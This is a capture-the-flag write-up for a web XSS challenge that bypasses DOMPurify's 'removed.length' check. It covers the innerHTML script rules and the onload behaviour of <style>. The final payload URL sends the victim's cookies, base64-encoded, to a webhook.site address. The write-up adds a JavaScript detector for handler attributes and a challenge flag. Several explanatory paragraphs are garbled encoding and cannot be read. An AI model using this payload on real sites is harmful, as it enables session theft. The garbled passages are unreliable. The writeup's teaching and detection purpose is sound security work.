Type: CTF
Year: 2025
Name: Nowruz 1404
Field: WEB
Subfield: XSS
Date: 2025/03/20 05:36

# Description

If nothing is removed, then it is surely safe. Hint: wait, why <script>1337</script> works??? App: https://mint-chall.fmc.tf/ Admin bot: https://mint-bot.fmc.tf/

# Analysis

# File

chall.html
A single HTML file is provided.
Looking at DOMPurify first, its source code can be found at the link below.
DOMPurify (cure53)
Checking what the library actually is, it describes itself as follows.
DOMPurify sanitizes HTML and prevents XSS attacks. Pass it a "dirty" HTML string full of dangerous content and, unless configured otherwise, it returns a safely sanitized HTML string. DOMPurify strips every element containing dangerous HTML, blocking XSS and other harmful content. It is also very fast: it builds its XSS filter on technologies the browser itself provides, so the faster the browser, the faster DOMPurify runs.
To download the source and do a bit of analysis, grab the same version of DOMPurify that the challenge loads.
After getting a rough understanding of how the source behaves, the challenge's requirements can be summarized as follows.
1. Take the value of the GET parameter p and append 🌱 to the end of it.
2. Run DOMPurify.sanitize on it.
3. If DOMPurify.removed.length is 0, i.e. nothing was removed, assign p to xss.innerHTML.

innerHTML Bypass

innerHTML์˜ ๊ฒฝ์šฐ ๊ฑฐ๊ธฐ์— ํฌํ•จ๋˜์–ด ์žˆ๋Š” <script></script>๋Š” ์‹คํ–‰๋˜์ง€ ์•Š๋Š”๋‹ค๊ณ  ์•„๋ž˜์˜ HTML Standard์—์„œ ์ •์˜๋˜์–ด์žˆ๋‹ค.
When inserted using theย document.write()ย method,ย scriptย elementsย usuallyย execute (typically blocking further script execution or HTML parsing). When inserted using theย innerHTMLย andย outerHTMLย attributes, they do not execute at all.
์ด๋ฅผ ์šฐํšŒํ•˜๊ธฐ ์œ„ํ•ด์„œ๋Š” <img> ํƒœ๊ทธ์™€ ๋™์ผํ•˜๊ฒŒ src ์†์„ฑ์„ ์ด์šฉํ•ด์„œ ์™ธ๋ถ€๋กœ ๋ถ€ํ„ฐ ๋ฐ์ดํ„ฐ๋ฅผ ์š”์ฒญํ•˜๋Š” ํƒœ๊ทธ๋ฅผ ์ด์šฉํ•˜๋Š” ๊ฒƒ๋“ค์„ ์ฐพ์•„์„œ onerror, onload์™€ ๊ฐ™์€ ์†์„ฑ์„ ์ด์šฉํ•˜์—ฌ Bypass๊ฐ€ ๊ฐ€๋Šฅํ•˜๋‹ค.

DOMPurify.sanitize Bypass

```html
<script>
  let p = ((new URLSearchParams(location.search)).get('p') ?? '') + `🌱`
  DOMPurify.sanitize(p)
  if (!DOMPurify.removed.length) xss.innerHTML = p
</script>
```
์ฝ”๋“œ์˜ ํ•ต์‹ฌ์„ ๋ณด๋ฉด xss.innerHTML์— ๋„ฃ์–ด์ฃผ๋Š” ๊ฒƒ์€ ์šฐ๋ฆฌ๊ฐ€ ์ž…๋ ฅํ•œ p ๊ฐ’์„ ๋„ฃ์–ด์ค€๋‹ค.
๋‹ค์‹œ๋งํ•ด DOMPurify.sanitize(p)๋ฅผ ์ง„ํ–‰ํ•ด๋„ DOMPurify.removed.length์ด ๋˜๋Š” Tag๋ฅผ ์ฐพ๊ณ  ํ•ด๋‹น Tag์— onload attribute๋งŒ ์ง€์›ํ•˜๋Š”์ง€ ํ™•์ธํ•ด์„œ ํ•ด๋‹น Tag๋ฅผ ์ด์šฉํ•ด์„œ ๊ณต๊ฒฉ์„ ์ง„ํ–‰ํ•˜๋ฉด ๋œ๋‹ค.

DOMPurify.removed.length Bypass

Analyzing the DOMPurify source gives a rough idea of which tags DOMPurify does not count as removed.
The notable ones are the <script> and <style> tags.
• <script>: the script tag does not support attributes like onload.
• <style>: supports the onload attribute.

# Payload

https://mint-chall.fmc.tf/?p=<style%20onload='location.href=`https://webhook.site/455194c0-8a95-453f-9240-a8498b46151c%3Fq%3D`%2Bbtoa(document.cookie)'></style>
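A detection-side companion to the payload above, added for this writeup and not part of the challenge or DOMPurify: given logged request URLs, pull out the p parameter and flag the two primitives this writeup uses, inline on* handler attributes and <script> elements. findRiskyMarkup, auditRequest and auditAll are names chosen for this example, and the request list is constructed, except for the third entry, which is the payload URL above.

```javascript
// Added example: audit the ?p= parameter of logged requests for the
// primitives this writeup uses (inline on* handlers, <script> elements).
// Constructed helper for this writeup; not part of the challenge or DOMPurify.

// Start-tag tokenizer. Adequate for scanning logged query strings; not a
// full HTML parser, so treat hits as triage signals rather than proof.
const START_TAG = /<([a-zA-Z][a-zA-Z0-9-]*)\b([^>]*)>/g;
// Inline handler attribute name, allowing whitespace around '='.
const HANDLER_ATTR = /(?:^|[\s"'/])(on[a-z]+)\s*=/gi;

function findRiskyMarkup(html) {
  const findings = [];
  for (const m of html.matchAll(START_TAG)) {
    const tag = m[1].toLowerCase();
    if (tag === 'script') findings.push('script element');
    for (const h of m[2].matchAll(HANDLER_ATTR)) {
      findings.push(`${tag}@${h[1].toLowerCase()}`);
    }
  }
  return findings;
}

// Pull p from a full request URL; searchParams.get() percent-decodes it,
// which is what the challenge page sees after URLSearchParams.
function auditRequest(urlString) {
  const p = new URL(urlString).searchParams.get('p') ?? '';
  return { p, findings: findRiskyMarkup(p) };
}

// Constructed request log; the third entry is the payload URL from this writeup.
const REQUESTS = [
  'https://mint-chall.fmc.tf/?p=%3Cb%3Ehi%3C%2Fb%3E',
  'https://mint-chall.fmc.tf/?p=%3Cscript%3E1337%3C%2Fscript%3E',
  "https://mint-chall.fmc.tf/?p=<style%20onload='location.href=`https://webhook.site/455194c0-8a95-453f-9240-a8498b46151c%3Fq%3D`%2Bbtoa(document.cookie)'></style>",
  'https://mint-chall.fmc.tf/?p=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E',
];

// Only the requests that carry something worth a look.
function auditAll(requests = REQUESTS) {
  return requests.map(auditRequest).filter((r) => r.findings.length > 0);
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const r of auditAll()) console.log(r.findings.join(', '), '<=', r.p);
}
```

Decoding with URL.searchParams matters: the payload arrives with %20, %3F and %2B encoded, so a rule that matches the raw query string for "onload=" would still fire here, but one that looks for a literal "?q=" or "+" would not.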

# Flag

FMCTF{a266b251865bb2627f945165a12598aa}